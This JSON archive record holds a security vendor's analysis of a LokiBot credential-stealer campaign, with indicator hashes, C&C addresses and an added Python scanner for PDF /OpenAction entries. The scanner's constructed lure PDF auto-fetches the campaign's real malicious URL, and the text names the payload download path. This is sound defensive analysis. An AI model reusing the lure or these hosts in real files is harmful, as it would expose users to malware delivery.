{
	"id": "630791d0-6ce6-450e-a500-5c59b0b2b7c2",
	"created_at": "2026-04-06T00:20:19.605773Z",
	"updated_at": "2026-04-10T03:20:35.764543Z",
	"deleted_at": null,
	"sha1_hash": "bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8",
	"title": "New Campaign Sees LokiBot Delivered Via Multiple Methods",
	"llm_title": "",
	"authors": "William Gamazo Sanchez, Bin Lin",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 807993,
	"plain_text": "New Campaign Sees LokiBot Delivered Via Multiple Methods\r\nBy: William Gamazo Sanchez, Bin Lin. Aug 25, 2021. Read time: 3 min (709 words)\r\nPublished: 2021-08-25 · Archived: 2026-04-05 19:37:35 UTC\r\nIntroduction\r\nWe recently detected an aggressive malware distribution campaign delivering LokiBot via multiple techniques, including the exploitation of older vulnerabilities. This blog entry describes and provides an example of one of the methods used in the campaign, as well as a short analysis of the payload. We found that one of the command-and-control (C&C) servers had directory browsing enabled, allowing us to retrieve updated samples.\r\nFigure 1. C&C server with directory browsing enabled\r\nAlthough none of these techniques are particularly new, we want to build awareness about this campaign and encourage users to patch their systems as soon as possible if they are potentially affected.\r\nAnalysis of the Adobe PDF malware delivery mechanism\r\nSome of the delivery methods we found included:\r\nPDF: Using an OpenAction object\r\nDOCX: Using the frameset mechanism\r\nRTF: Exploitation of CVE-2017-11882\r\nInternet Explorer: Exploitation of CVE-2016-0189\r\nExcel: Using embedded OLE objects and Word documents (with further exploitation of old vulnerabilities)\r\nLet’s take a look at one of the delivery methods, a PDF document attached to an email masquerading as an order invoice to fool customers. The PDF file, shown in Figure 2, is named “Revised invoice 2.pdf.”\r\nhttps://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html\r\nPage 1 of 7\n\nFigure 2. Screenshot of the PDF document sent to the targeted victim\r\nWhen the document is opened, the user is presented with the option to allow or block a connection to a specific host, 198[.]23[.]212[.]137.\r\nFigure 3. Option presented to the user upon opening the document\r\nThe URL is stored as a URI action in the /OpenAction entry of the PDF catalog dictionary, so the viewer tries to fetch it as soon as the user opens the document; no link has to be clicked, and the only thing standing between the user and the request is the viewer's allow/block prompt.\r\nFigure 4. PDF document dictionary\r\nIf the user allows access to the site, an HTTP request is sent to http://198[.]23[.]212[.]137/document/pdf_r34567888[.]html. The server responds with a malicious HTML document, shown in Figure 5.\r\nFigure 5. Code snippets from the malicious HTML page returned from the server\r\nThe malicious web page exploits CVE-2016-0189, a memory corruption vulnerability in the Internet Explorer VBScript engine that was patched in 2016, to run the embedded PowerShell script.\r\nThe credential-stealing payload\r\nAfter deobfuscation, we can see that the PowerShell script attempts to download the payload from http://198[.]23[.]212[.]137/regedit/reg/vbc[.]exe.\r\nThe payload vbc.exe is a variant of the LokiBot trojan that we first detected in 2019. The main purpose of the malware is to steal user credentials stored by web browsers, FTP clients, and SMTP clients. It appears to have been compiled recently and uploaded to VirusTotal.\r\nFigure 6. Compilation timestamp of the malware\r\nFigure 7. Default folders\r\nFigure 8. C&C server POST request\r\nThe importance of timely patching and observing best practices for security\r\nThis campaign shows that LokiBot and its variants are still widely used and still rely on old but reliable delivery techniques such as social engineering and vulnerability exploitation.\r\nUsers can protect themselves from campaigns that involve these techniques by observing basic security practices, such as refraining from clicking links and opening attachments in suspicious or unsolicited emails. Organizations and individuals should also update their systems as soon as possible, since some of the delivery methods discussed in this blog post rely on exploits for vulnerabilities that were patched years ago.\r\nThe following security solutions can also protect users from email-based attacks:\r\nTrend Micro™ Cloud App Security – Enhances the security of Microsoft Office 365 and other cloud services via computer vision and real-time scanning. It also protects organizations from email-based threats.\r\nTrend Micro™ Deep Discovery™ Email Inspector – Defends users through a combination of real-time scanning and advanced analysis techniques for known and unknown attacks.\r\nIndicators of Compromise\r\nDescription | SHA-256 / URL / IP address | Detection name\r\nRevised invoice 2 .pdf | c59ac77c8c2f2450c942840031ad72d3bac69b7ebe780049b4e9741c51e001ab | Trojan.PDF.POWLOAD.AM\r\n2021-08-09_220350.pdf.pdf | 5a586164674423eb4d58f664c1625c6dfabcd7418048f18d4b0ab0b9df3733eb | Trojan.PDF.POWLOAD.AM\r\nshipment assessment.pdf | fb7fe37e263406349b29afb8ee980ca70004ee32ea5e5254b9614a3f8696daca | Trojan.PDF.POWLOAD.AM\r\nLOA.PDF.pdf | 98983e00b47bcbe9ebbaf5f28ea6cdbf619dd88c91f481b18fec7ffdb68ab741 | Trojan.PDF.POWLOAD.AM\r\nBunker invoice 023.pdf | 71998bb4882f71a9e09b1eb86bac1e0a0ac75bc4c20ee11373b90173cedc7d0b | Trojan.PDF.POWLOAD.AM\r\nPO JHS-PO-2108-11425.rar-1.pdf | e5d84990d7abd7b65655ac262d3cad346cdaf47f5861bff8b33b8bc755832288 | Trojan.PDF.POWLOAD.AM\r\nN/A | 2210000d2f877c9fd87efe97605e90549c5d9008a90f9b062a570fc12437e318 | Trojan.W97M.LOKI.AOR\r\nContract 1459-PO21-15.docx | e7a518b83d9f57a4cb8726afc6bb27a15f6e68655552e13b24481df83b9320fb | Trojan.W97M.LOKI.AOR\r\nPI I229-I231.xlsx | fc5bf62f57c77efa9f9264878f1753a35c27fb44bce7d9a00f8f094315355661 | Trojan.X97M.CVE20180802.\r\nS28BW-421072010440.PDF.xlsx | c6aede79cc1608da1e3ed5c8853b1718351429573679d6b847c90c44e48137d4 | Trojan.X97M.CVE20180802.\r\n64DBB078907CDEB6E76CE5B8A21BB98A.mlw | 639f6453e961aa33302d34962ccdd29fbc9235b2a0df8b1ac0acc0bb040af7e0 | Trojan.W97M.LOKI.AOT\r\nPO20-003609.xlsx | b1b0045f890afd14b4168b4fc0017ac39c281fe5eee66d3c9523040e63220eb4 | Trojan.X97M.CVE201711882\r\nrwer.wbk | 3798eb011f5d8ee7f41e3666dac7fac279cf670ad4af4060aaef33a7def3c6f7 | Trojan.W97M.CVE201711882\r\npdf_r34567888.html | 45f1b4b0a627f1a2072818d00456dc4fc6607edf9a1a1c484f04f800d25b93d2 | Trojan.HTML.POWLOAD.EQ\r\npdf_rg234999233.html | da56c38fad7c2ee8e829aea9bd3c4b523ea0b65e935805d68df12c7a28e5d5dd | Trojan.HTML.POWLOAD.EQ\r\nvbc.exe | d8bb1bb8587840321e74cf2ab2f3596344cbb5ffeb77060bd9aade848fed03fd | TrojanSpy.Win32.LOKI.PUHB\r\nvbc.exe | 9f66135d831d5ba4972ba5db9e0fd4515dfaecc92013a741679d6cddbe29ab25 | TrojanSpy.Win32.LOKI.PUHB\r\nvbc.exe | 324d549fb7b9999aa0e6fb8a6824f7a05fe5f1f21d76fb2d360cb34c56eb1995 | TrojanSpy.Win32.LOKI.PUHB\r\nvbc.exe | ca155beb7d28cde5147eba7907c453d433b7675ba1830e87d5a4e409b5b912e1 | TrojanSpy.Win32.LOKI.PUHB\r\nURL | http://198[.]23[.]212[.]137/document/pdf_document_s233322[.]html | Phishing\r\nURL | http://198[.]23[.]212[.]137/document/pdf_document_sw211222[.]html | Disease Vector\r\nURL | https://ulvis[.]net/Q4gl | Disease Vector\r\nURL | https://ulvis[.]net/Q4km | Disease Vector\r\nURL | http://198[.]23[.]212[.]137/document/pdf_rg234999233[.]html | Disease Vector\r\nURL | http://198[.]23[.]212[.]137/document/pdf_r34567888[.]html | Disease Vector\r\nC&C IP address | 198[.]23[.]212[.]137 | C&C Server\r\nC&C IP address | 104[.]21[.]62[.]89 | C&C Server\r\nC&C IP address | 104[.]21[.]71[.]169 | C&C Server\r\nC&C IP address | 185[.]227[.]139[.]5 | C&C Server\r\nC&C IP address | 46[.]173[.]214[.]209 | C&C Server\r\nC&C IP address | 192[.]227[.]228[.]106 | C&C Server\r\nSource: https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html",
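	"editor_example": "The /OpenAction delivery step described in the article text is the one mechanism on this page a defender can check for directly in a suspicious attachment. The scanner below is an added example written for this corpus record, not code from the Trend Micro post. It walks a PDF's plain-text objects, resolves the /OpenAction value whether it is an inline dictionary, an indirect reference (n g R) or a bare destination array, and reports the action subtype plus any /URI target. Both PDF samples are constructed here: the first mimics the lure the article describes (the host and path are the ones the article reports), the second is a benign document whose open action only selects the first page.

```python
import re
from typing import Optional

# Action subtypes that cause network or code activity when the document opens.
RISKY_ACTIONS = {'URI', 'JavaScript', 'Launch', 'SubmitForm', 'ImportData', 'GoToR', 'GoToE'}

# PDF whitespace (space, tab, LF, CR), used inside regex character classes.
WS = ' ' + chr(9) + chr(10) + chr(13)

# Constructed sample 1: the catalog's /OpenAction is an indirect reference to a
# /URI action, the mechanism the article describes. The target is the URL the
# article reports for this campaign, kept here as inert data only.
LURE_PDF = b'''%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
4 0 obj
<< /Type /Action /S /URI /URI (http://198.23.212.137/document/pdf_r34567888.html) >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
'''

# Constructed sample 2: a benign /OpenAction, a destination array that only
# tells the viewer which page to show first. A scanner must not flag this.
BENIGN_PDF = b'''%PDF-1.7
1 0 obj
<< /Type /Catalog /Pages 2 0 R /OpenAction [3 0 R /Fit] >>
endobj
2 0 obj
<< /Type /Pages /Kids [3 0 R] /Count 1 >>
endobj
3 0 obj
<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>
endobj
trailer
<< /Root 1 0 R >>
%%EOF
'''


def _balanced_dict(text: str, start: int) -> str:
    '''Return the dictionary literal that begins at text[start] (a << token), honouring nesting.'''
    depth, i = 0, start
    while i < len(text):
        if text.startswith('<<', i):
            depth += 1
            i += 2
        elif text.startswith('>>', i):
            depth -= 1
            i += 2
            if depth == 0:
                return text[start:i]
        else:
            i += 1
    raise ValueError('unterminated dictionary')


def _object_body(text: str, num: int, gen: int) -> str:
    '''Return the body of the indirect object written as num gen obj ... endobj.'''
    header = re.escape(f'{num} {gen} obj')
    m = re.search('(^|[' + WS + '])' + header + '[' + WS + ']', text)
    if not m:
        raise ValueError(f'object {num} {gen} not found')
    end = text.find('endobj', m.end())
    if end < 0:
        raise ValueError(f'object {num} {gen} has no endobj')
    return text[m.end():end]


def open_action(pdf: bytes) -> Optional[dict]:
    '''Describe the document-open action of a PDF.

    Returns None when there is no /OpenAction, otherwise a dict holding the
    action subtype, the /URI target if any, and whether that subtype fetches a
    remote resource or runs code when the file is opened.
    '''
    text = pdf.decode('latin-1')          # PDF syntax is byte oriented; latin-1 is lossless
    m = re.search('/OpenAction[' + WS + ']*', text)
    if not m:
        return None
    i = m.end()
    if text.startswith('[', i):           # bare destination array: open at a page, nothing else
        return {'type': 'GoTo', 'uri': None, 'risky': False}
    if text.startswith('<<', i):          # inline action dictionary
        action = _balanced_dict(text, i)
    else:                                 # indirect reference of the form n g R
        ref = re.match('([0-9]+)[' + WS + ']+([0-9]+)[' + WS + ']+R', text[i:])
        if not ref:
            raise ValueError('unparseable /OpenAction value')
        body = _object_body(text, int(ref.group(1)), int(ref.group(2)))
        j = body.find('<<')
        if j < 0:                         # referenced object is itself a destination array
            return {'type': 'GoTo', 'uri': None, 'risky': False}
        action = _balanced_dict(body, j)
    s = re.search('/S[' + WS + ']*/([A-Za-z]+)', action)
    kind = s.group(1) if s else 'GoTo'    # a dictionary without /S is a destination, i.e. GoTo
    u = re.search('/URI[' + WS + ']*[(]([^)]*)[)]', action)
    return {'type': kind, 'uri': u.group(1) if u else None, 'risky': kind in RISKY_ACTIONS}


if __name__ == '__main__':
    for name, blob in (('lure', LURE_PDF), ('benign', BENIGN_PDF)):
        print(name, open_action(blob))
```

Two limits matter in practice. The scanner only sees objects stored as plain text; real lures routinely hide the catalog or the action inside a compressed object stream (/ObjStm with /FlateDecode), so a production check has to inflate streams first or lean on a purpose-built tool such as Didier Stevens' pdfid and pdf-parser. And /OpenAction is not the only auto-run hook: /AA additional-action entries on the catalog, pages and form fields, and a /Names /JavaScript tree, deserve the same scrutiny.",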
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/h/new-campaign-sees-lokibot-delivered-via-multiple-methods.html"
	],
	"report_names": [
		"new-campaign-sees-lokibot-delivered-via-multiple-methods.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434819,
	"ts_updated_at": 1775791235,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8.pdf",
		"text": "https://archive.orkl.eu/bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8.txt",
		"img": "https://archive.orkl.eu/bece82bb7d386e822b5ca0da7e4a8a16f75f7fb8.jpg"
	}
}